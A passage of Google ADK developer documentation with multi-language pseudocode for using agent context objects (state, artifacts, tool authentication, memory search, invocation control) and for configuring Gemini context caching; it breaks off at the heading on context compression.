        if err != nil {
            userPref = "default_mode"
        }
        apiEndpoint, _ := tc.State().Get("app:api_endpoint") // Read app-level state

        if userPref == "dark_mode" {
            // ... apply dark mode logic ...
        }
        fmt.Printf("Using API endpoint: %v\n", apiEndpoint)
        // ... rest of tool logic ...
        return toolResults{}, nil
    }

    // Pseudocode: In a Callback function
    func myCallback(ctx agent.CallbackContext) (*genai.Content, error) {
        lastToolResult, err := ctx.State().Get("temp:last_api_result") // Read temporary state
        if err == nil {
            fmt.Printf("Found temporary result from last tool: %v\n", lastToolResult)
        } else {
            fmt.Println("No temporary result found.")
        }
        // ... callback logic ...
        return nil, nil
    }
    ```

    ```java
    // Pseudocode: In a Tool function
    import com.google.adk.tools.ToolContext;

    public void myTool(ToolContext toolContext) {
      String userPref = (String) toolContext.state().get("user_display_preference");
      String apiEndpoint = (String) toolContext.state().get("app:api_endpoint"); // Read app-level state
      if ("dark_mode".equals(userPref)) {
        // ... apply dark mode logic ...
      }
      System.out.println("Using API endpoint: " + apiEndpoint);
      // ... rest of tool logic ...
    }

    // Pseudocode: In a Callback function
    import com.google.adk.agents.CallbackContext;

    public void myCallback(CallbackContext callbackContext) {
      String lastToolResult = (String) callbackContext.state().get("temp:last_api_result"); // Read temporary state
      if (lastToolResult != null && !lastToolResult.isEmpty()) {
        System.out.println("Found temporary result from last tool: " + lastToolResult);
      }
      // ... callback logic ...
    }
    ```

- **Getting Current Identifiers:** Useful for logging or custom logic based on the current operation.

    ```python
    # Pseudocode: In any context (ToolContext shown)
    from google.adk.tools import ToolContext

    def log_tool_usage(tool_context: ToolContext, **kwargs):
        agent_name = tool_context.agent_name
        inv_id = tool_context.invocation_id
        func_call_id = getattr(tool_context, 'function_call_id', 'N/A')  # Specific to ToolContext
        print(f"Log: Invocation={inv_id}, Agent={agent_name}, FunctionCallID={func_call_id} - Tool Executed.")
    ```

    ```typescript
    // Pseudocode: In any context (ToolContext shown)
    import { ToolContext } from '@google/adk';

    function logToolUsage(toolContext: ToolContext) {
      const agentName = toolContext.agentName;
      const invId = toolContext.invocationId;
      const functionCallId = toolContext.functionCallId ?? 'N/A'; // Specific to ToolContext
      console.log(`Log: Invocation=${invId}, Agent=${agentName}, FunctionCallID=${functionCallId} - Tool Executed.`);
    }
    ```

    ```go
    import (
        "fmt"

        "google.golang.org/adk/tool"
    )

    // Pseudocode: In any context (ToolContext shown)
    type logToolUsageArgs struct{}

    type logToolUsageResult struct {
        Status string `json:"status"`
    }

    func logToolUsage(tc tool.Context, args logToolUsageArgs) (logToolUsageResult, error) {
        agentName := tc.AgentName()
        invID := tc.InvocationID()
        funcCallID := tc.FunctionCallID()
        fmt.Printf("Log: Invocation=%s, Agent=%s, FunctionCallID=%s - Tool Executed.\n", invID, agentName, funcCallID)
        return logToolUsageResult{Status: "Logged successfully"}, nil
    }
    ```

    ```java
    // Pseudocode: In any context (ToolContext shown)
    import com.google.adk.tools.ToolContext;

    public void logToolUsage(ToolContext toolContext) {
      String agentName = toolContext.agentName();
      String invId = toolContext.invocationId();
      String functionCallId = toolContext.functionCallId().orElse("N/A"); // Specific to ToolContext
      System.out.println("Log: Invocation= " + invId + " Agent= " + agentName + " FunctionCallID= " + functionCallId);
    }
    ```

- **Accessing the Initial User Input:** Refer back to the
message that started the current invocation. ```python # Pseudocode: In a Callback from google.adk.agents.callback_context import CallbackContext def check_initial_intent(callback_context: CallbackContext, **kwargs): initial_text = "N/A" if callback_context.user_content and callback_context.user_content.parts: initial_text = callback_context.user_content.parts[0].text or "Non-text input" print(f"This invocation started with user input: '{initial_text}'") # Pseudocode: In an Agent's _run_async_impl # async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: # if ctx.user_content and ctx.user_content.parts: # initial_text = ctx.user_content.parts[0].text # print(f"Agent logic remembering initial query: {initial_text}") # ... ``` ```typescript // Pseudocode: In a Callback import { CallbackContext } from '@google/adk'; function checkInitialIntent(callbackContext: CallbackContext) { let initialText = 'N/A'; const userContent = callbackContext.userContent; if (userContent?.parts?.length) { initialText = userContent.parts[0].text ?? 'Non-text input'; } console.log(`This invocation started with user input: '${initialText}'`); } ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/genai" ) // Pseudocode: In a Callback func logInitialUserInput(ctx agent.CallbackContext) (*genai.Content, error) { userContent := ctx.UserContent() if userContent != nil && len(userContent.Parts) > 0 { if text := userContent.Parts[0].Text; text != "" { fmt.Printf("User's initial input for this turn: '%s'\n", text) } } return nil, nil // No modification } ``` ```java // Pseudocode: In a Callback import com.google.adk.agents.CallbackContext; public void checkInitialIntent(CallbackContext callbackContext){ String initialText = "N/A"; if((!(callbackContext.userContent().isEmpty())) && (!(callbackContext.userContent().parts.isEmpty()))){ initialText = cbx.userContent().get().parts().get().get(0).text().get(); ... 
System.out.println("This invocation started with user input: " + initialText); } } ``` ### Managing State State is crucial for memory and data flow. When you modify state using `CallbackContext` or `ToolContext`, the changes are automatically tracked and persisted by the framework. - **How it Works:** Writing to `callback_context.state['my_key'] = my_value` or `tool_context.state['my_key'] = my_value` adds this change to the `EventActions.state_delta` associated with the current step's event. The `SessionService` then applies these deltas when persisting the event. - **Passing Data Between Tools:** ```python # Pseudocode: Tool 1 - Fetches user ID from google.adk.tools import ToolContext import uuid def get_user_profile(tool_context: ToolContext) -> dict: user_id = str(uuid.uuid4()) # Simulate fetching ID # Save the ID to state for the next tool tool_context.state["temp:current_user_id"] = user_id return {"profile_status": "ID generated"} # Pseudocode: Tool 2 - Uses user ID from state def get_user_orders(tool_context: ToolContext) -> dict: user_id = tool_context.state.get("temp:current_user_id") if not user_id: return {"error": "User ID not found in state"} print(f"Fetching orders for user ID: {user_id}") # ... logic to fetch orders using user_id ... return {"orders": ["order123", "order456"]} ``` ```typescript // Pseudocode: Tool 1 - Fetches user ID import { ToolContext } from '@google/adk'; import { v4 as uuidv4 } from 'uuid'; function getUserProfile(toolContext: ToolContext): Record<string, unknown> { const userId = uuidv4(); // Simulate fetching ID // Save the ID to state for the next tool toolContext.state.set('temp:current_user_id', userId); return { profile_status: 'ID generated' }; } // Pseudocode: Tool 2 - Uses user ID from state function getUserOrders(toolContext: ToolContext): Record<string, unknown> { const userId = toolContext.state.get('temp:current_user_id'); if (!userId) { return { error: 'User ID not found in state' }; } console.log(`Fetching orders for user ID: ${userId}`); // ... 
logic to fetch orders using user_id ... return { orders: ['order123', 'order456'] }; } ``` ```go import ( "fmt" "google.golang.org/adk/tool" ) // Pseudocode: Tool 1 - Fetches user ID type GetUserProfileArgs struct { } func getUserProfile(tc tool.Context, input GetUserProfileArgs) (string, error) { // A random user ID for demonstration purposes userID := "random_user_456" // Save the ID to state for the next tool if err := tc.State().Set("temp:current_user_id", userID); err != nil { return "", fmt.Errorf("failed to set user ID in state: %w", err) } return "ID generated", nil } // Pseudocode: Tool 2 - Uses user ID from state type GetUserOrdersArgs struct { } type getUserOrdersResult struct { Orders []string `json:"orders"` } func getUserOrders(tc tool.Context, input GetUserOrdersArgs) (*getUserOrdersResult, error) { userID, err := tc.State().Get("temp:current_user_id") if err != nil { return &getUserOrdersResult{}, fmt.Errorf("user ID not found in state") } fmt.Printf("Fetching orders for user ID: %v\n", userID) // ... logic to fetch orders using user_id ... return &getUserOrdersResult{Orders: []string{"order123", "order456"}}, nil } ``` ```java // Pseudocode: Tool 1 - Fetches user ID import com.google.adk.tools.ToolContext; import java.util.Map; import java.util.UUID; public Map<String, String> getUserProfile(ToolContext toolContext){ String userId = UUID.randomUUID().toString(); // Save the ID to state for the next tool toolContext.state().put("temp:current_user_id", userId); return Map.of("profile_status", "ID generated"); } // Pseudocode: Tool 2 - Uses user ID from state public Map<String, String> getUserOrders(ToolContext toolContext){ Object userId = toolContext.state().get("temp:current_user_id"); if(userId == null){ return Map.of("error", "User ID not found in state"); } System.out.println("Fetching orders for user id: " + userId); // ... logic to fetch orders using user_id ... 
return Map.of("orders", "order123"); } ``` - **Updating User Preferences:** ```python # Pseudocode: Tool or Callback identifies a preference from google.adk.tools import ToolContext # Or CallbackContext def set_user_preference(tool_context: ToolContext, preference: str, value: str) -> dict: # Use 'user:' prefix for user-level state (if using a persistent SessionService) state_key = f"user:{preference}" tool_context.state[state_key] = value print(f"Set user preference '{preference}' to '{value}'") return {"status": "Preference updated"} ``` ```typescript // Pseudocode: Tool or Callback identifies a preference import { ToolContext } from '@google/adk'; // Or CallbackContext function setUserPreference(toolContext: ToolContext, preference: string, value: string): Record { // Use 'user:' prefix for user-level state (if using a persistent SessionService) const stateKey = `user:${preference}`; toolContext.state.set(stateKey, value); console.log(`Set user preference '${preference}' to '${value}'`); return { status: 'Preference updated' }; } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: Tool or Callback identifies a preference type setUserPreferenceArgs struct { Preference string `json:"preference" jsonschema:"The name of the preference to set."` Value string `json:"value" jsonschema:"The value to set for the preference."` } type setUserPreferenceResult struct { Status string `json:"status"` } func setUserPreference(tc tool.Context, args setUserPreferenceArgs) (setUserPreferenceResult, error) { // Use 'user:' prefix for user-level state (if using a persistent SessionService) stateKey := fmt.Sprintf("user:%s", args.Preference) if err := tc.State().Set(stateKey, args.Value); err != nil { return setUserPreferenceResult{}, fmt.Errorf("failed to set preference in state: %w", err) } fmt.Printf("Set user preference '%s' to '%s'\n", args.Preference, args.Value) return setUserPreferenceResult{Status: "Preference updated"}, nil } ``` ```java // Pseudocode: Tool or 
Callback identifies a preference import com.google.adk.tools.ToolContext; // Or CallbackContext public Map setUserPreference(ToolContext toolContext, String preference, String value){ // Use 'user:' prefix for user-level state (if using a persistent SessionService) String stateKey = "user:" + preference; toolContext.state().put(stateKey, value); System.out.println("Set user preference '" + preference + "' to '" + value + "'"); return Map.of("status", "Preference updated"); } ``` - **State Prefixes:** While basic state is session-specific, prefixes like `app:` and `user:` can be used with persistent `SessionService` implementations (like `DatabaseSessionService` or `VertexAiSessionService`) to indicate broader scope (app-wide or user-wide across sessions). `temp:` can denote data only relevant within the current invocation. ### Working with Artifacts Use artifacts to handle files or large data blobs associated with the session. Common use case: processing uploaded documents. - **Document Summarizer Example Flow:** 1. **Ingest Reference (e.g., in a Setup Tool or Callback):** Save the *path or URI* of the document, not the entire content, as an artifact. 
```python # Pseudocode: In a callback or initial tool from google.adk.agents.callback_context import CallbackContext # Or ToolContext from google.genai import types def save_document_reference(context: CallbackContext, file_path: str) -> None: # Assume file_path is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try: # Create a Part containing the path/URI text artifact_part = types.Part(text=file_path) version = context.save_artifact("document_to_summarize.txt", artifact_part) print(f"Saved document reference '{file_path}' as artifact version {version}") # Store the filename in state if needed by other tools context.state["temp:doc_artifact_name"] = "document_to_summarize.txt" except ValueError as e: print(f"Error saving artifact: {e}") # E.g., Artifact service not configured except Exception as e: print(f"Unexpected error saving artifact reference: {e}") # Example usage: # save_document_reference(callback_context, "gs://my-bucket/docs/report.pdf") ``` ```typescript // Pseudocode: In a callback or initial tool import { CallbackContext } from '@google/adk'; // Or ToolContext import type { Part } from '@google/genai'; async function saveDocumentReference(context: CallbackContext, filePath: string) { // Assume filePath is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try { // Create a Part containing the path/URI text const artifactPart: Part = { text: filePath }; const version = await context.saveArtifact('document_to_summarize.txt', artifactPart); console.log(`Saved document reference '${filePath}' as artifact version ${version}`); // Store the filename in state if needed by other tools context.state.set('temp:doc_artifact_name', 'document_to_summarize.txt'); } catch (e) { console.error(`Unexpected error saving artifact reference: ${e}`); } } // Example usage: // saveDocumentReference(callbackContext, "gs://my-bucket/docs/report.pdf"); ``` ```go import ( "google.golang.org/adk/tool" 
"google.golang.org/genai" ) // Adapt the saveDocumentReference callback into a tool for this example. type saveDocRefArgs struct { FilePath string `json:"file_path" jsonschema:"The path to the file to save."` } type saveDocRefResult struct { Status string `json:"status"` } func saveDocRef(tc tool.Context, args saveDocRefArgs) (saveDocRefResult, error) { artifactPart := genai.NewPartFromText(args.FilePath) _, err := tc.Artifacts().Save(tc, "document_to_summarize.txt", artifactPart) if err != nil { return saveDocRefResult{}, err } fmt.Printf("Saved document reference '%s' as artifact\n", args.FilePath) if err := tc.State().Set("temp:doc_artifact_name", "document_to_summarize.txt"); err != nil { return saveDocRefResult{}, fmt.Errorf("failed to set artifact name in state: %w", err) } return saveDocRefResult{Status: "Reference saved"}, nil } ``` ```java // Pseudocode: In a callback or initial tool import com.google.adk.agents.CallbackContext; import com.google.genai.types.Part; import java.util.Optional; public void saveDocumentReference(CallbackContext context, String filePath){ // Assume filePath is something like "gs://my-bucket/docs/report.pdf" or "/local/path/to/report.pdf" try{ // Create a Part containing the path/URI text Part artifactPart = Part.fromText(filePath); Optional<Integer> version = context.saveArtifact("document_to_summarize.txt", artifactPart); System.out.println("Saved document reference '" + filePath + "' as artifact version " + version); // Store the filename in state if needed by other tools context.state().put("temp:doc_artifact_name", "document_to_summarize.txt"); } catch(Exception e){ System.out.println("Unexpected error saving artifact reference: " + e); } } // Example usage: // saveDocumentReference(context, "gs://my-bucket/docs/report.pdf") ``` 1. **Summarizer Tool:** Load the artifact to get the path/URI, read the actual document content using appropriate libraries, summarize, and return the result. 
```python # Pseudocode: In the Summarizer tool function from google.adk.tools import ToolContext from google.genai import types # Assume libraries like google.cloud.storage or built-in open are available # Assume a 'summarize_text' function exists # from my_summarizer_lib import summarize_text def summarize_document_tool(tool_context: ToolContext) -> dict: artifact_name = tool_context.state.get("temp:doc_artifact_name") if not artifact_name: return {"error": "Document artifact name not found in state."} try: # 1. Load the artifact part containing the path/URI artifact_part = tool_context.load_artifact(artifact_name) if not artifact_part or not artifact_part.text: return {"error": f"Could not load artifact or artifact has no text path: {artifact_name}"} file_path = artifact_part.text print(f"Loaded document reference: {file_path}") # 2. Read the actual document content (outside ADK context) document_content = "" if file_path.startswith("gs://"): # Example: Use GCS client library to download/read # from google.cloud import storage # client = storage.Client() # blob = storage.Blob.from_string(file_path, client=client) # document_content = blob.download_as_text() # Or bytes depending on format pass # Replace with actual GCS reading logic elif file_path.startswith("/"): # Example: Use local file system with open(file_path, 'r', encoding='utf-8') as f: document_content = f.read() else: return {"error": f"Unsupported file path scheme: {file_path}"} # 3. Summarize the content if not document_content: return {"error": "Failed to read document content."} # summary = summarize_text(document_content) # Call your summarization logic summary = f"Summary of content from {file_path}" # Placeholder return {"summary": summary} except ValueError as e: return {"error": f"Artifact service error: {e}"} except FileNotFoundError: return {"error": f"Local file not found: {file_path}"} # except Exception as e: # Catch specific exceptions for GCS etc. 
# return {"error": f"Error reading document {file_path}: {e}"} ``` ```typescript // Pseudocode: In the Summarizer tool function import { ToolContext } from '@google/adk'; async function summarizeDocumentTool(toolContext: ToolContext): Promise> { const artifactName = toolContext.state.get('temp:doc_artifact_name') as string; if (!artifactName) { return { error: 'Document artifact name not found in state.' }; } try { // 1. Load the artifact part containing the path/URI const artifactPart = await toolContext.loadArtifact(artifactName); if (!artifactPart?.text) { return { error: `Could not load artifact or artifact has no text path: ${artifactName}` }; } const filePath = artifactPart.text; console.log(`Loaded document reference: ${filePath}`); // 2. Read the actual document content (outside ADK context) let documentContent = ''; if (filePath.startsWith('gs://')) { // Example: Use GCS client library to download/read // const storage = new Storage(); // const bucket = storage.bucket('my-bucket'); // const file = bucket.file(filePath.replace('gs://my-bucket/', '')); // const [contents] = await file.download(); // documentContent = contents.toString(); } else if (filePath.startsWith('/')) { // Example: Use local file system // import { readFile } from 'fs/promises'; // documentContent = await readFile(filePath, 'utf8'); } else { return { error: `Unsupported file path scheme: ${filePath}` }; } // 3. Summarize the content if (!documentContent) { return { error: 'Failed to read document content.' 
}; } // const summary = summarizeText(documentContent); // Call your summarization logic const summary = `Summary of content from ${filePath}`; // Placeholder return { summary }; } catch (e) { return { error: `Error processing artifact: ${e}` }; } } ``` ```go import "google.golang.org/adk/tool" // Pseudocode: In the Summarizer tool function type summarizeDocumentArgs struct{} type summarizeDocumentResult struct { Summary string `json:"summary"` } func summarizeDocumentTool(tc tool.Context, input summarizeDocumentArgs) (summarizeDocumentResult, error) { artifactName, err := tc.State().Get("temp:doc_artifact_name") if err != nil { return summarizeDocumentResult{}, fmt.Errorf("No document artifact name found in state") } // 1. Load the artifact part containing the path/URI artifactPart, err := tc.Artifacts().Load(tc, artifactName.(string)) if err != nil { return summarizeDocumentResult{}, err } if artifactPart.Part.Text == "" { return summarizeDocumentResult{}, fmt.Errorf("Could not load artifact or artifact has no text path.") } filePath := artifactPart.Part.Text fmt.Printf("Loaded document reference: %s\n", filePath) // 2. Read the actual document content (outside ADK context) // In a real implementation, you would use a GCS client or local file reader. documentContent := "This is the fake content of the document at " + filePath _ = documentContent // Avoid unused variable error. // 3. Summarize the content summary := "Summary of content from " + filePath // Placeholder return summarizeDocumentResult{Summary: summary}, nil } ``` ```java // Pseudocode: In the Summarizer tool function import com.google.adk.tools.ToolContext; import com.google.genai.types.Content; import com.google.genai.types.Part; public Map summarizeDocumentTool(ToolContext toolContext){ String artifactName = toolContext.state().get("temp:doc_artifact_name"); if(artifactName.isEmpty()){ return Map.of("error", "Document artifact name not found in state."); } try{ // 1. 
Load the artifact part containing the path/URI Part artifactPart = toolContext.loadArtifact(artifactName).blockingGet(); // Resolve the Maybe; null when no artifact exists if((artifactPart == null) || (artifactPart.text().isEmpty())){ return Map.of("error", "Could not load artifact or artifact has no text path: " + artifactName); } String filePath = artifactPart.text().get(); System.out.println("Loaded document reference: " + filePath); // 2. Read the actual document content (outside ADK context) String documentContent = ""; if(filePath.startsWith("gs://")){ // Example: Use GCS client library to download/read into documentContent (replace with actual GCS reading logic) } else if(filePath.startsWith("/")){ // Example: Use local file system to read into documentContent } else{ return Map.of("error", "Unsupported file path scheme: " + filePath); } // 3. Summarize the content if(documentContent.isEmpty()){ return Map.of("error", "Failed to read document content."); } // String summary = summarizeText(documentContent); // Call your summarization logic String summary = "Summary of content from " + filePath; // Placeholder return Map.of("summary", summary); } catch(IllegalArgumentException e){ return Map.of("error", "Artifact service error for " + artifactName + ": " + e); } catch(Exception e){ return Map.of("error", "Error reading document for " + artifactName + ": " + e); } } ``` - **Listing Artifacts:** Discover what files are available. 
```python
# Pseudocode: In a tool function
from google.adk.tools import ToolContext

def check_available_docs(tool_context: ToolContext) -> dict:
    try:
        artifact_keys = tool_context.list_artifacts()
        print(f"Available artifacts: {artifact_keys}")
        return {"available_docs": artifact_keys}
    except ValueError as e:
        return {"error": f"Artifact service error: {e}"}
```

```typescript
// Pseudocode: In a tool function
import { ToolContext } from '@google/adk';

async function checkAvailableDocs(toolContext: ToolContext): Promise<Record<string, unknown>> {
  try {
    const artifactKeys = await toolContext.listArtifacts();
    console.log(`Available artifacts: ${artifactKeys}`);
    return { available_docs: artifactKeys };
  } catch (e) {
    return { error: `Artifact service error: ${e}` };
  }
}
```

```go
import (
    "fmt"

    "google.golang.org/adk/tool"
)

// Pseudocode: In a tool function
type checkAvailableDocsArgs struct{}

type checkAvailableDocsResult struct {
    AvailableDocs []string `json:"available_docs"`
}

func checkAvailableDocs(tc tool.Context, args checkAvailableDocsArgs) (checkAvailableDocsResult, error) {
    artifactKeys, err := tc.Artifacts().List(tc)
    if err != nil {
        return checkAvailableDocsResult{}, err
    }
    fmt.Printf("Available artifacts: %v\n", artifactKeys)
    return checkAvailableDocsResult{AvailableDocs: artifactKeys.FileNames}, nil
}
```

```java
// Pseudocode: In a tool function
import com.google.adk.tools.ToolContext;
import java.util.List;
import java.util.Map;

public Map<String, Object> checkAvailableDocs(ToolContext toolContext){
    try{
        // listArtifacts() returns a Single; block on it here to keep the example short
        List<String> artifactKeys = toolContext.listArtifacts().blockingGet();
        System.out.println("Available artifacts: " + artifactKeys);
        return Map.of("availableDocs", artifactKeys);
    } catch(IllegalArgumentException e){
        return Map.of("error", "Artifact service error: " + e);
    }
}
```

### Handling Tool Authentication

Supported in ADK: Python v0.1.0, TypeScript v0.2.0

Securely manage API keys or other credentials needed by tools.
```python # Pseudocode: Tool requiring auth from google.adk.tools import ToolContext from google.adk.auth import AuthConfig # Assume appropriate AuthConfig is defined # Define your required auth configuration (e.g., OAuth, API Key) MY_API_AUTH_CONFIG = AuthConfig(...) AUTH_STATE_KEY = "user:my_api_credential" # Key to store retrieved credential def call_secure_api(tool_context: ToolContext, request_data: str) -> dict: # 1. Check if credential already exists in state credential = tool_context.state.get(AUTH_STATE_KEY) if not credential: # 2. If not, request it print("Credential not found, requesting...") try: tool_context.request_credential(MY_API_AUTH_CONFIG) # The framework handles yielding the event. The tool execution stops here for this turn. return {"status": "Authentication required. Please provide credentials."} except ValueError as e: return {"error": f"Auth error: {e}"} # e.g., function_call_id missing except Exception as e: return {"error": f"Failed to request credential: {e}"} # 3. If credential exists (might be from a previous turn after request) # or if this is a subsequent call after auth flow completed externally try: # Optionally, re-validate/retrieve if needed, or use directly # This might retrieve the credential if the external flow just completed auth_credential_obj = tool_context.get_auth_response(MY_API_AUTH_CONFIG) api_key = auth_credential_obj.api_key # Or access_token, etc. # Store it back in state for future calls within the session tool_context.state[AUTH_STATE_KEY] = auth_credential_obj.model_dump() # Persist retrieved credential print(f"Using retrieved credential to call API with data: {request_data}") # ... Make the actual API call using api_key ... api_result = f"API result for {request_data}" return {"result": api_result} except Exception as e: # Handle errors retrieving/using the credential print(f"Error using credential: {e}") # Maybe clear the state key if credential is invalid? 
# tool_context.state[AUTH_STATE_KEY] = None return {"error": "Failed to use credential"} ``` ```typescript // Pseudocode: Tool requiring auth import { ToolContext } from '@google/adk'; // AuthConfig from ADK or custom // Define a local AuthConfig interface as it's not publicly exported by ADK interface AuthConfig { credentialKey: string; authScheme: { type: string }; // Minimal representation for the example // Add other properties if they become relevant for the example } // Define your required auth configuration (e.g., OAuth, API Key) const MY_API_AUTH_CONFIG: AuthConfig = { credentialKey: 'my-api-key', // Example key authScheme: { type: 'api-key' }, // Example scheme type }; const AUTH_STATE_KEY = 'user:my_api_credential'; // Key to store retrieved credential async function callSecureApi(toolContext: ToolContext, requestData: string): Promise> { // 1. Check if credential already exists in state const credential = toolContext.state.get(AUTH_STATE_KEY); if (!credential) { // 2. If not, request it console.log('Credential not found, requesting...'); try { toolContext.requestCredential(MY_API_AUTH_CONFIG); // The framework handles yielding the event. The tool execution stops here for this turn. return { status: 'Authentication required. Please provide credentials.' }; } catch (e) { return { error: `Auth or credential request error: ${e}` }; } } // 3. If credential exists (might be from a previous turn after request) // or if this is a subsequent call after auth flow completed externally try { // Optionally, re-validate/retrieve if needed, or use directly // This might retrieve the credential if the external flow just completed const authCredentialObj = toolContext.getAuthResponse(MY_API_AUTH_CONFIG); const apiKey = authCredentialObj?.apiKey; // Or accessToken, etc. 
// Store it back in state for future calls within the session // Note: In strict TS, might need to cast or serialize authCredentialObj toolContext.state.set(AUTH_STATE_KEY, JSON.stringify(authCredentialObj)); console.log(`Using retrieved credential to call API with data: ${requestData}`); // ... Make the actual API call using apiKey ... const apiResult = `API result for ${requestData}`; return { result: apiResult }; } catch (e) { // Handle errors retrieving/using the credential console.error(`Error using credential: ${e}`); // Maybe clear the state key if credential is invalid? // toolContext.state.set(AUTH_STATE_KEY, null); return { error: 'Failed to use credential' }; } } ``` *Remember: `request_credential` pauses the tool and signals the need for authentication. The user/system provides credentials, and on a subsequent call, `get_auth_response` (or checking state again) allows the tool to proceed.* The `tool_context.function_call_id` is used implicitly by the framework to link the request and response. ### Leveraging Memory Supported in ADK: Python v0.1.0, TypeScript v0.2.0 Access relevant information from the past or external sources. 
```python
# Pseudocode: Tool using memory search
from google.adk.tools import ToolContext

def find_related_info(tool_context: ToolContext, topic: str) -> dict:
    try:
        search_results = tool_context.search_memory(f"Information about {topic}")
        if search_results.results:
            print(f"Found {len(search_results.results)} memory results for '{topic}'")
            # Process search_results.results (which are SearchMemoryResponseEntry)
            top_result_text = search_results.results[0].text
            return {"memory_snippet": top_result_text}
        else:
            return {"message": "No relevant memories found."}
    except ValueError as e:
        return {"error": f"Memory service error: {e}"}  # e.g., Service not configured
    except Exception as e:
        return {"error": f"Unexpected error searching memory: {e}"}
```

```typescript
// Pseudocode: Tool using memory search
import { ToolContext } from '@google/adk';

async function findRelatedInfo(toolContext: ToolContext, topic: string): Promise<Record<string, unknown>> {
  try {
    const searchResults = await toolContext.searchMemory(`Information about ${topic}`);
    if (searchResults.results?.length) {
      console.log(`Found ${searchResults.results.length} memory results for '${topic}'`);
      // Process searchResults.results
      const topResultText = searchResults.results[0].text;
      return { memory_snippet: topResultText };
    } else {
      return { message: 'No relevant memories found.' };
    }
  } catch (e) {
    return { error: `Memory service error: ${e}` }; // e.g., Service not configured
  }
}
```

### Advanced: Direct `InvocationContext` Usage

Supported in ADK: Python v0.1.0, TypeScript v0.2.0

While most interactions happen via `CallbackContext` or `ToolContext`, sometimes the agent's core logic (`_run_async_impl`/`_run_live_impl`) needs direct access.
```python # Pseudocode: Inside agent's _run_async_impl from google.adk.agents import BaseAgent from google.adk.agents.invocation_context import InvocationContext from google.adk.events import Event from google.genai import types from typing import AsyncGenerator class MyControllingAgent(BaseAgent): async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: # Example: Check if a specific service is available if not ctx.memory_service: print("Memory service is not available for this invocation.") # Potentially change agent behavior # Example: Early termination based on some condition if ctx.session.state.get("critical_error_flag"): print("Critical error detected, ending invocation.") ctx.end_invocation = True # Signal framework to stop processing yield Event(author=self.name, invocation_id=ctx.invocation_id, content=types.Content(parts=[types.Part(text="Stopping due to critical error.")])) return # Stop this agent's execution # ... Normal agent processing ... yield # ... event ... ``` ```typescript // Pseudocode: Inside agent's runAsyncImpl import { BaseAgent, InvocationContext } from '@google/adk'; import type { Event } from '@google/adk'; class MyControllingAgent extends BaseAgent { async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator<Event> { // Example: Check if a specific service is available if (!ctx.memoryService) { console.log('Memory service is not available for this invocation.'); // Potentially change agent behavior } // Example: Early termination based on some condition // Direct access to state via ctx.session.state or through ctx.session.state property if wrapped if ((ctx.session.state as { 'critical_error_flag': boolean })['critical_error_flag']) { console.log('Critical error detected, ending invocation.'); ctx.endInvocation = true; // Signal framework to stop processing yield { author: this.name, invocationId: ctx.invocationId, content: { parts: [{ text: 'Stopping due to critical error.' }] } } as Event; return; // Stop this agent's execution } // ... Normal agent processing ... yield; // ... 
event ... } } ``` Setting `ctx.end_invocation = True` is a way to gracefully stop the entire request-response cycle from within the agent or its callbacks/tools (via their respective context objects which also have access to modify the underlying `InvocationContext`'s flag). ## Key Takeaways & Best Practices - **Use the Right Context:** Always use the most specific context object provided (`ToolContext` in tools/tool-callbacks, `CallbackContext` in agent/model-callbacks, `ReadonlyContext` where applicable). Use the full `InvocationContext` (`ctx`) directly in `_run_async_impl` / `_run_live_impl` only when necessary. - **State for Data Flow:** `context.state` is the primary way to share data, remember preferences, and manage conversational memory *within* an invocation. Use prefixes (`app:`, `user:`, `temp:`) thoughtfully when using persistent storage. - **Artifacts for Files:** Use `context.save_artifact` and `context.load_artifact` for managing file references (like paths or URIs) or larger data blobs. Store references, load content on demand. - **Tracked Changes:** Modifications to state or artifacts made via context methods are automatically linked to the current step's `EventActions` and handled by the `SessionService`. - **Start Simple:** Focus on `state` and basic artifact usage first. Explore authentication, memory, and advanced `InvocationContext` fields (like those for live streaming) as your needs become more complex. By understanding and effectively using these context objects, you can build more sophisticated, stateful, and capable agents with ADK. # Context caching with Gemini Supported in ADK: Python v1.15.0 When working with agents to complete tasks, you may want to reuse extended instructions or large sets of data across multiple agent requests to a generative AI model. Resending this data for each agent request is slow, inefficient, and can be expensive. 
Using context caching features in generative AI models can significantly speed up responses and lower the number of tokens sent to the model for each request.

The ADK Context Caching feature allows you to cache request data with generative AI models that support it, including Gemini 2.0 and higher models. This document explains how to configure and use this feature.

## Configure context caching

You configure the context caching feature at the ADK `App` object level, which wraps your agent. Use the `ContextCacheConfig` class to configure these settings, as shown in the following code sample:

```python
from google.adk import Agent
from google.adk.apps.app import App
from google.adk.agents.context_cache_config import ContextCacheConfig

root_agent = Agent(
    # configure an agent using Gemini 2.0 or higher
)

# Create the app with context caching configuration
app = App(
    name='my-caching-agent-app',
    root_agent=root_agent,
    context_cache_config=ContextCacheConfig(
        min_tokens=2048,    # Minimum tokens to trigger caching
        ttl_seconds=600,    # Store for up to 10 minutes
        cache_intervals=5,  # Refresh after 5 uses
    ),
)
```

## Configuration settings

The `ContextCacheConfig` class has the following settings that control how caching works for your agent. When you configure these settings, they apply to all agents within your app.

- **`min_tokens`** (int): The minimum number of tokens required in a request to enable caching. This setting allows you to avoid the overhead of caching for very small requests where the performance benefit would be negligible. Defaults to `0`.
- **`ttl_seconds`** (int): The time-to-live (TTL) for the cache in seconds. This setting determines how long the cached content is stored before it is refreshed. Defaults to `1800` (30 minutes).
- **`cache_intervals`** (int): The maximum number of times the same cached content can be used before it expires. This setting allows you to control how frequently the cache is updated, even if the TTL has not expired.
Defaults to `10`.

## Next steps

For a full implementation of how to use and test the context caching feature, see the following sample:

- [`cache_analysis`](https://github.com/google/adk-python/tree/main/contributing/samples/cache_analysis): A code sample that demonstrates how to analyze the performance of context caching.

If your use case requires that you provide instructions that are used throughout a session, consider using the `static_instruction` parameter for an agent, which allows you to amend the system instructions for a generative model. For more details, see this sample code:

- [`static_instruction`](https://github.com/google/adk-python/tree/main/contributing/samples/static_instruction): An implementation of a digital pet agent using static instructions.

# Compress agent context for performance

Supported in ADK: Python v1.16.0

